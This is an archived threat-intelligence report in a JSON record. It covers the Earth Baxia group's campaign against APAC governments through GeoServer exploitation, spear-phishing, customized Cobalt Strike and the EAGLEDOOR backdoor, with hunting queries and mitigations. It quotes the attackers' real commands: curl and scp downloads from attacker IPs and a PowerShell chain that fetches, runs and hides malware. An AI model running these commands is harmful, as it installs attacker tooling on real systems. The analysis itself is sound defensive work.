{ "id": "d9da2d74-c6ae-4f40-b76f-e87e7120f575", "created_at": "2026-04-06T00:16:45.421449Z", "updated_at": "2026-04-10T03:32:45.911495Z", "deleted_at": null, "sha1_hash": "48662a307345cd5482cf7d8bfe048c1aeba86a41", "title": "Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 6042245, "plain_text": "Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target\r\nAPAC\r\nPublished: 2024-09-19 · Archived: 2026-04-02 11:07:36 UTC\r\nAPT \u0026 Targeted Attacks\r\nWe observed Earth Baxia carrying out targeted attacks against APAC countries that involved advanced techniques\r\nlike spear-phishing and customized malware, with data suggesting that the group operates from China.\r\nBy: Ted Lee, Cyris Tseng, Pierre Lee, Sunny Lu, Philip Chen Sep 19, 2024 Read time: 8 min (2227 words)\r\nSummary\r\nThreat actor Earth Baxia has targeted a government organization in Taiwan – and potentially other\r\ncountries in the Asia-Pacific (APAC) region – using spear-phishing emails and the GeoServer vulnerability\r\nCVE-2024-36401.\r\nCVE-2024-36401 is a remote code execution exploit that allowed the threat actors to download or copy\r\nmalicious components.\r\nThe threat actor employs GrimResource and AppDomainManager injection to deploy additional payloads,\r\naiming to lower the victim’s guard.\r\nCustomized Cobalt Strike components were deployed on compromised machines through the two initial\r\naccess vectors. The altered version of Cobalt Strike included modified internal signatures and a changed\r\nconfiguration structure for evasion.\r\nEarth Baxia also used a new backdoor named EAGLEDOOR, which supports multiple communication\r\nprotocols for information gathering and payload delivery.\r\nIn July, we observed suspicious activity targeting a government organization in Taiwan, with other APAC\r\ncountries also likely targeted, attributed to the threat actor Earth Baxia. In these campaigns, Earth Baxia used\r\nspear-phishing emails and exploited CVE-2024-36401open on a new tab, a vulnerability in an open-source server\r\nfor sharing geospatial data called GeoServer, as initial access vectors, deploying customized Cobalt Strike\r\ncomponents on compromised machines. Additionally, we identified a new backdoor called EAGLEDOOR that\r\nsupports multiple protocols. In this report, we will discuss their infection chain and provide a detailed analysis of\r\nthe malware involved.\r\nAttribution and victimology\r\nUpon investigation, we discovered that multiple servers were hosted on the Alibaba cloud service or located in\r\nHong Kong, and some related samples were submitted to VirusTotal from China. After checking one of the Cobalt\r\nStrike watermarks (666666) used by the threat actors on Shodan, we also found that only a few machines were\r\nhttps://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html\r\nPage 1 of 10\n\nlinked to this watermark, most of which were in China (Table 1). Therefore, we suspect that the APT group behind\r\nthese campaigns originates from China.\r\nCountry Number of machines\r\nChina 13\r\nJapan 1\r\nSingapore 1\r\nTable 1. Machines linked to the Cobalt Strike watermark 666666\r\nBased on the collected phishing emails, decoy documents, and observations from incidents, it appears that the\r\ntargets are primarily government agencies, telecommunication businesses, and the energy industry in the\r\nPhilippines, South Korea, Vietnam, Taiwan, and Thailand (Figure 1). Notably, we also discovered a decoy\r\ndocument written in simplified Chinese, suggesting that China is also one of the impacted countries. However, due\r\nto limited information, we cannot accurately determine which sectors in China are affected.\r\nInfection chain\r\nIn this section, we will discuss the threat group’s attack flow as identified by our telemetry, including the malware\r\nand tactics, techniques, and procedures (TTPs) involved, as shown in Figure 2.\r\nInitial access\r\nVulnerable GeoServer\r\nIn some cases, Earth Baxia leveraged CVE-2024-36401, a remote code execution (RCE) exploit on GeoServer, to\r\nexecute arbitrary commands: Our investigation revealed that they used commands like “curl” and “scp” to\r\ndownload or copy malicious components into the victim’s environment, and then executed these components\r\nusing the RCE exploit (Table 2).\r\nThe file download via curl is as follows:\r\ncurl  --connect-timeout 3 -m 10 -o c:\\windows\\temp\\{file name} http://167[.]172[.]89[.]142/{file name}\r\nThe remote file copy via scp is follows:\r\ncmd /c \"scp -P 23 -o StrictHostKeyChecking=no -o ConnectTimeout=3 -o\r\nUserKnownHostsFile=C:\\windows\\temp\\ t1sc@152[.]42[.]243[.]170:/tmp/bd/{file name} c:\\windows\\temp\\\"\r\nFile name Description\r\nEdge.exe Legitimate executable used to load msedge.dll\r\nmsedge.dll Malicious loader (SWORDLDR) used to launch Cobalt Strike (Logs.txt)\r\nhttps://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html\r\nPage 2 of 10\n\nLogs.txt Customized Cobalt Strike shellcode\r\nTable 2. The malicious components downloaded by RCE exploit\r\nSpear-phishing email vector\r\nIn early August, Earth Baxia began leveraging phishing emails to advance their attacks. One of the victims\r\nreported receiving over 70 phishing emails within approximately two weeks. We also identified similar email\r\nattachments on VirusTotal. Analysis of the decoy documents suggests that the attackers may have targeted not just\r\nTaiwan, but also Vietnam and China.\r\nMost of the email subjects are meticulously tailored with varying content; the attached ZIP file contains a decoy\r\nMSC file, which we named RIPCOY. At this stage, when the user double-clicks this file, the embedded obfuscated\r\nVBScript attempts to download multiple files from a public cloud service, typically Amazon Web Services (AWS)\r\nin a technique called GrimResourceopen on a new tab. These files include a decoy PDF document, .NET\r\napplications, and a configuration file.\r\nThe .NET applications and configuration file dropped by the MSC file then use a technique known as\r\nAppDomainManager injectionopen on a new tab, which allows the injection of a custom application domain to\r\nexecute arbitrary code within the process of the target application. It enables the execution of any .NET\r\napplication to load an arbitrary managed DLL, either locally or remotely from a website, without directly invoking\r\nany Windows API calls (Figure 3).\r\nopen on a new tab\r\nFigure 3. The configuration file contains download sites loaded by the .NET framework application\r\nThe legitimate .NET applications then proceed to download the next-stage downloader based on the URL\r\nspecified in the .config file, which points to a .NET DLL file (Figure 4). The URL for this download is obfuscated\r\nusing Base64 and AES encryption. Most of the download sites identified at this stage were hosted on public cloud\r\nservices, typically Aliyun. Once the DLL retrieves the shellcode, it executes it using the CreateThread API, with\r\nall processes running entirely in memory.\r\nhttps://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html\r\nPage 3 of 10\n\nopen on a new tab\r\nFigure 4. The .NET DLL file contains a download site with obfuscated code\r\nThe shellcode gathers information from the affected machine, including the username, computer name, parent\r\nprocess (the legitimate .NET application), and memory status. It appends this information as a ‘client_id’\r\nparameter to a URL and sends it to a custom domain. It may receive a 64-character response from the server,\r\nwhich is then used to request the next payload from the URL (Figure 5). However, we couldn’t receive the final\r\npayload.\r\nopen on a new tab\r\nFigure 5. A screenshot of network traffic analysis from the VirusTotal sandbox\r\nThe shellcode exhibited several distinct features:\r\nThe attacker disguised the domain names to resemble public cloud services by using names like “s3cloud-azure” or “s2cloud-amazon”. Each network request followed a specific pattern, including a unique user-agent string and data formatted in JSON.\r\nhttps://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html\r\nPage 4 of 10\n\nThe final stage of the download process always had the path “/api/v1/homepage/”, suggesting that the file\r\nmight still be hosted on a third-party cloud service.\r\nBy hosting files on the cloud, the attacker gains the advantage of easily replacing or updating files,\r\nincluding .config files with different download links, making it significantly more challenging for us to\r\ntrack their activities.\r\nAlthough we didn’t confirm what the final shellcode was, our telemetry did reveal that the “oncesvc.exe”\r\nlaunched by the MSC file would run another process, “Edge.exe”, to load the Cobalt Strike components\r\nmsedge.dll and Logs.txt. In the next section, we discuss these components further.\r\nBackdoor analysis\r\nCobalt Strike\r\nEarth Baxia utilizes DLL side-loading to execute Cobalt Strike shellcode (Figure 6). To evade defenses, the\r\nshellcode loader, known as “SWORDLDR,” decrypts the payload and injects it into a specified process according\r\nto its embedded configuration (Figure 7). \r\nThe injected shellcode is a customized version of Cobalt Strike. Unlike the usual Cobalt Strike payload, the\r\nmodified version’s MZ header has been removed and the internal signatures have been modified (Figure 8).\r\nAdditionally, the structure of configuration has also been slightly changed (Figure 9).   \r\nopen on a new tab\r\nFigure 8. Header differences between the usual (left) and modified (right) versions of Cobalt Strike\r\nhttps://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html\r\nPage 5 of 10\n\nopen on a new tab\r\nFigure 9. Differences in configuration structures between the usual (left) and modified (right)\r\nversions of Cobalt Strike\r\nEAGLEDOOR\r\nOn the victim side, we collected these sample sets:\r\nSystemsetting.dll (EAGLEDOOR loader)\r\nSystemsetting.exe\r\nThese samples are components of EAGLEDOOR, which was dropped and launched by the Cobalt Strike process\r\nmentioned previously.\r\nThe threat actors apply DLL side-loading to start the loader and execute EAGLEDOOR in memory. In the loader,\r\nthere are two DLL files encrypted in the .data section:\r\nHook.dll\r\nThis is the module for hooking the specific API with export function, MyCreateHook, to hook the APIs which are\r\nfrequently called (Figure 10). Once the hooked API is called, the malicious module, Eagle.dll, will be executed.\r\nhttps://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html\r\nPage 6 of 10\n\nopen on a new tab\r\nFigure 10. Loader applies hook.dll to hook the APIs, GetProcAddress, FreeLibrary and\r\nLdrUnloadDll\r\nEagle.dll\r\nThe code flow of launching Eagle.dll is shown below. The loader decrypts this module and executes the first\r\nexport function “RunEagle” in the memory (Figure 11). \r\nEAGLEDOOR supports four methods to communicate with a C\u0026C server:\r\nDNS\r\nHTTP\r\nTCP\r\nTelegram\r\nUpon analysis, TCP, HTTP and DNS protocol are utilized to send the victim machine’s status to a C\u0026C server.\r\nThe main backdoor functionality is achieved by Telegram protocol through the Bot API, and the applied methods\r\ninclude:\r\ngetFile\r\ngetUpdates\r\nsendDocument\r\nsendMessage\r\nThese methods are effective for gathering information, delivering files, and executing the next payload on the\r\nvictim's system. However, in this case, we only collected samples related to TCP and HTTP protocols on the\r\nvictim side. Therefore, we will keep monitoring the channel to track the threat actors' next steps in their Telegram\r\ncommunications.\r\nExfiltration\r\nBased on our investigation, we observed that Earth Baxia would archive the collected data and exfiltrate stolen\r\ndata by using curl.exe. Figure 12 shows a case of data exfiltration to their file server (152[.]42[.]243[.]170)\r\nthrough curl.\r\nhttps://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html\r\nPage 7 of 10\n\nFurther observations\r\nMost phishing emails lure users with an attachment. However, based on our telemetry, some phishing emails are\r\nsent with a phishing link that downloads a ZIP file. So far, we know there are four combinations at the initial\r\naccess stage, as shown in Figure 13. Both MSC file and LNK file are able to deliver those two toolsets.\r\nWhile investigating the case, we came across the download site static[.]krislab[.]site in an LNK file. It executes a\r\nPowerShell command to download decoy documents and Cobalt Strike toolsets, which include Edge.exe,\r\nmsedge.dll, and Logs.txt (Table 3). This toolset is similar to the one we mentioned earlier in this blog entry.\r\nEach zip file contains a LNK file with the target PowerShell command:\r\nwget -Uri https://static.krislab.site/infodata/msedge.dll -OutFile C:\\Users\\Public\\msedge.dll; wget -Uri http\r\ns://static.krislab.site/infodata/Logs.txt -OutFile C:\\Users\\Public\\Logs.txt;wget -Uri https://static.krislab.site/infoda\r\nta/Edge.exe -OutFile C:\\Users\\Public\\Edge.exe;C:\\Users\\Public\\Edge.exe;wget -Uri\r\n\"https://static.krislab.site/infodata/yn.pdf\" -OutFile \"C:\\Users\\Public\\邀請\r\n函.pdf\";C:\\Windows\\System32\\cmd.exe /c start /b \"C:\\Users\\Public\\邀請函.pdf\";attrib +s +h\r\nC:\\Users\\Public\\Edge.exe;attrib +s +h C:\\Users\\Public\\Logs.txt;attrib +s +h C:\\Users\\Public\\msedge.dll\r\nDiscovered Date Path File description\r\nJune 21, 2024\r\n/infodata/Invitation1017.zip\r\nCobalt Strike tool set\r\n/infodata/Edge.exe\r\n/infodata/msedge.dll\r\n/infodata/Logs.txt\r\n/infodata/tw.pdf Decoy document\r\nJune 25, 2024 /infodata/break_1/06.pdf Decoy document\r\nJune 30, 2024\r\n/infodata/Invitation0630.zip\r\nCobalt Strike tool set\r\n/infodata/Edge.exe\r\n/infodata/msedge.dll\r\n/infodata/Logs.txt\r\n/infodata/yn.pdf Decoy document\r\nJuly 2, 2024 /infodata/Invitation0702.zip\r\nCobalt Strike tool set\r\n/infodata/Edge.exe\r\n/infodata/msedge.dll\r\n/infodata/Logs.txt\r\nhttps://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html\r\nPage 8 of 10\n\n/infodata/hzm.pdf Decoy document\r\nAugust 15, 2024\r\n/infodata/Edge.exe\r\n/infodata/msedge.dll Cobalt Strike tool set\r\n/infodata/Logs.txt\r\n/infodata/k1.pdf Decoy document\r\nTable 3. Files hosted on static[.]krislab[.]site\r\nTrend Micro Vision One Threat Intelligence \r\nTo stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat\r\nInsights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they\r\nhappen and better prepared for emerging threats. It offers comprehensive information on threat actors, their\r\nmalicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive\r\nsteps to protect their environments, mitigate risks, and respond effectively to threats.\r\nTrend Micro Vision One Intelligence Reports App [IOC Sweeping]\r\nEarth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC\r\nEarth Baxia: A dive into their aggressive campaign in August\r\nTrend Micro Vision One Threat Insights App\r\nThreat Actor: Earth Baxiaopen on a new tab\r\nEmerging Threats: Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APACopen on a new\r\ntab\r\nHunting Queries\r\nTrend Micro Vision One Search App\r\nVision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog\r\npost with data in their environment.    \r\nNetwork Communication with Earth Baxia - IP\r\neventId:3 AND (src:\"167.172.89.142\" OR src:\"167.172.84.142\" OR src:\"152.42.243.170\" OR\r\nsrc:\"188.166.252.85\" OR dst:\"167.172.89.142\" OR dst:\"167.172.84.142\" OR dst:\"152.42.243.170\" OR\r\ndst:\"188.166.252.85\")\r\nMore hunting queries are available for Vision One customers with Threat Insights Entitlement enabledopen on a\r\nnew tab. \r\nConclusion\r\nhttps://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html\r\nPage 9 of 10\n\nEarth Baxia, likely based in China, conducted a sophisticated campaign targeting government and energy sectors\r\nin multiple APAC countries. They used advanced techniques like GeoServer exploitation, spear-phishing, and\r\ncustomized malware (Cobalt Strike and EAGLEDOOR) to infiltrate and exfiltrate data. The use of public cloud\r\nservices for hosting malicious files and the multi-protocol support of EAGLEDOOR highlight the complexity and\r\nadaptability of their operations.\r\nContinued vigilance and advanced threat detection measures are essential to counter such threats. To mitigate the\r\nrisk of this kind of threat, security teams can also implement the following best practices:\r\nImplement continuous phishing awareness training for employees.\r\nDouble-check the sender and subject of emails, particularly those from unfamiliar sources or with vague\r\nsubjects.\r\nDeploy multi-layered protection solutions to help detect and block threats early in the malware infection\r\nchain.\r\nOrganizations can help protect themselves from these kinds of attacks with Trend Vision One™open on a new tab,\r\nwhich enables security teams to continuously identify attack surfaces, including known, unknown, managed, and\r\nunmanaged cyber assets. Vision One helps organizations prioritize and address potential risks, including\r\nvulnerabilities. It considers critical factors such as the likelihood and impact of potential attacks and offers a range\r\nof prevention, detection, and response capabilities. The multilayered protection and behavior detection Vision One\r\noffers can help block malicious tools and services before they can inflict damage on user machines and systems.\r\nIndicators of Compromise (IOCs)\r\nThe full list of IOCs can be found hereopen on a new tab.\r\nIoCs changed on July 9, 2025 to correct attribution of certain entries.\r\nTags\r\nSource: https://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html\r\nhttps://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html\r\nPage 10 of 10", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "MISPGALAXY", "Malpedia" ], "references": [ "https://www.trendmicro.com/en_us/research/24/i/earth-baxia-spear-phishing-and-geoserver-exploit.html" ], "report_names": [ "earth-baxia-spear-phishing-and-geoserver-exploit.html" ], "threat_actors": [ { "id": "610a7295-3139-4f34-8cec-b3da40add480", "created_at": "2023-01-06T13:46:38.608142Z", "updated_at": "2026-04-10T02:00:03.03764Z", "deleted_at": null, "main_name": "Cobalt", "aliases": [ "Cobalt Group", "Cobalt Gang", "GOLD KINGSWOOD", "COBALT SPIDER", "G0080", "Mule Libra" ], "source_name": "MISPGALAXY:Cobalt", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f45af9e4-5037-4a5a-82c1-4627845eea49", "created_at": "2024-09-26T02:00:04.286721Z", "updated_at": "2026-04-10T02:00:03.707415Z", "deleted_at": null, "main_name": "Earth Baxia", "aliases": [], "source_name": "MISPGALAXY:Earth Baxia", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4b7f4f69-7c56-4691-9071-9365884a7f30", "created_at": "2024-10-25T02:02:07.672671Z", "updated_at": "2026-04-10T02:00:04.660715Z", "deleted_at": null, "main_name": "Earth Baxia", "aliases": [], "source_name": "ETDA:Earth Baxia", "tools": [ "Agentemis", "Cobalt Strike", "CobaltStrike", "EAGLEDOOR", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31", "created_at": "2023-01-06T13:46:38.376868Z", "updated_at": "2026-04-10T02:00:02.949077Z", "deleted_at": null, "main_name": "Cleaver", "aliases": [ "G0003", "Operation Cleaver", "Op Cleaver", "Tarh Andishan", "Alibaba", "TG-2889", "Cobalt Gypsy" ], "source_name": "MISPGALAXY:Cleaver", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434605, "ts_updated_at": 1775791965, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/48662a307345cd5482cf7d8bfe048c1aeba86a41.pdf", "text": "https://archive.orkl.eu/48662a307345cd5482cf7d8bfe048c1aeba86a41.txt", "img": "https://archive.orkl.eu/48662a307345cd5482cf7d8bfe048c1aeba86a41.jpg" } }